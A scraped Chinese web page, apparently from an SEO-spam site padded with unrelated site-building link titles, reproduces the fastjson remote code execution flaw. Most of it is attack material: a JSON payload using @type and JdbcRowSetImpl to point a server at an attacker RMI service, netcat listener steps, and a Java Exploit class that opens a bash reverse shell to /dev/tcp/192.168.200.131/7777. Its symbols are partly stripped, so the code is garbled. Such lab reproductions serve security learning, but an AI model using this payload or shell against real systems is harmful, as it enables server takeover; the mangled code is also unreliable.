当前位置: 首页 > news >正文

京东网站建设的详细策划重庆建筑公司排名

news 2025/12/20 19:03:35
京东网站建设的详细策划,重庆建筑公司排名,广州十大游戏公司,做调研的网站一般有哪些fastjson远程代码执行 漏洞原因#xff1a;fastjson在对json字符串反序列化的时候#xff0c;会读取到type的内容#xff0c;将json内容反序列化为java对象并调用这个类的setter方法。 1、搭建rmi服务 直接利用jndi-exploit工具 2、抓包改为POST。开启nc监听、发包 PO…fastjson远程代码执行 漏洞原因fastjson在对json字符串反序列化的时候会读取到type的内容将json内容反序列化为java对象并调用这个类的setter方法。 1、搭建rmi服务 直接利用jndi-exploit工具 2、抓包改为POST。开启nc监听、发包 POST的json数据 Content-Type: application/json Content-Length: 你的数据长度{a:{type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl},b:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:开的RMI服务,autoCommit:true} }这里响应400不用管环境原因。vps上看到反弹shell是收到了的 收到shell 使用恶意文件反弹shell过程 // javac Exploit.java import java.lang.Runtime; import java.lang.Process;public class Exploit {static {try {Runtime rt Runtime.getRuntime();String[] commands {/bin/bash,-c,bash -i /dev/tcp/192.168.200.131/7777 01};Process pc rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}} }具体过程和log4j2一样。 可以看看上一篇文章 log4j2漏洞复现
http://www.pierceye.com/news/643501/

相关文章:

  • 惠州网站建设方案推广企业网站必备模块
  • 网站内页产品做跳转做电商有哪些平台
  • 如何自建网站服务器wordpress下载权限
  • 重庆专业网站设计服务做染料的网站
  • 长春模板建站公司浙江住房和建设厅网站
  • 网站建设公司 佛山南京移动网站建设
  • 网站建设目录规范微信h5网站开发
  • 做ppt卖给网站枣庄做网站优化
  • 新乡营销型网站建设做软件的中介网站
  • 延边州建设局网站软件公司主要做哪些
  • 建设网站带后台管理程序制作软件
  • 榆林市住房和城市建设局网站梁志天设计公司项目
  • 建设网站怎么搞做非法网站判刑多少年
  • 做查询网站 发布数据wordpress nextapp
  • 福鼎建设局网站首页上海社区网站建设
  • 企业网站免费推广方案wordpress文章类模板
  • 从化区住房和建设局网站网站开发所需要的的环境
  • 深圳微商城网站制作联系电话国家信息网
  • 网站没有收录怎么办巴中城乡和住房建设厅网站
  • 做个网站要钱吗wordpress动漫网站模板
  • 高性能网站建设进阶指南下载wdcp 快速迁移网站
  • 建设教育协会网站房产资讯的网站怎么做
  • 网站网页怎么做如何查看网站做没做竞价
  • 济南建网站的网站l临沂建设工程信息网站
  • 网站建设美词原创php网站开发实验总结
  • 遵义建设厅网站如何申请个人网站域名
  • 济南建设网官方网站合肥市建设行政主管部门网站
  • 书怎么做pdf下载网站信息流优化师需要具备哪些能力
  • 专业制作公司网站公司公积金网站建设方案
  • 专门做产品定制的网站自豪得用wordpress删